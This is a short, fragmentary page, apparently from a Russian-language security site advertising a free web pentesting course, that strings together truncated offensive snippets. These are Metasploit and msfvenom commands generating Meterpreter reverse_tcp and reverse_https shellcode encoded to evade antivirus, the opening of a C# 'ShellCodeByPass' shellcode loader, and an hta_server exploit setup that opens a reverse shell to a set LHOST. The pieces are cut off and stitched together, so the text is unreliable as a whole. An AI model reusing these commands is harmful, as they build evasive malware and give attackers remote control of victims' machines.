Познакомьтесь с пентестом веб-приложений на практике в нашем новом бесплатном курсе
int main( void )
{
HANDLE file;
HANDLE proc;
proc =...
use windows/meterpreter/reverse_tcp
set LHOST 192.168.1.237
set LPORT 1338
set EXITFUNC thread
generate -e x86/shikata_ga_nai -b '\x00' -i 3 -t csharp
using System;
using System.Runtime.InteropServices;
namespace ShellCodeByPass
{
public class Program
{
[Flags]
public enum AllocationType : uint
{
COMMIT = 0x1000,
RESERVE = 0x2000,
RESET = 0x80000,
LARGE_PAGES = 0x20000000,
PHYSICAL = 0x400000,
TOP_DOWN = 0x100000,
WRITE_WATCH = 0x200000
}...
msfvenom -p windows/meterpreter/reverse_https lport=1337 lhost=192.168.137.137 -b \0x0a\0x0b\0xff -f c
use exploit/windows/misc/hta_server
set payload /windows/meterpreter/reverse_tcp
set LHOST 172.16.0.160
set SRVHOST 172.16.0.160
set LPORT 4444
exploit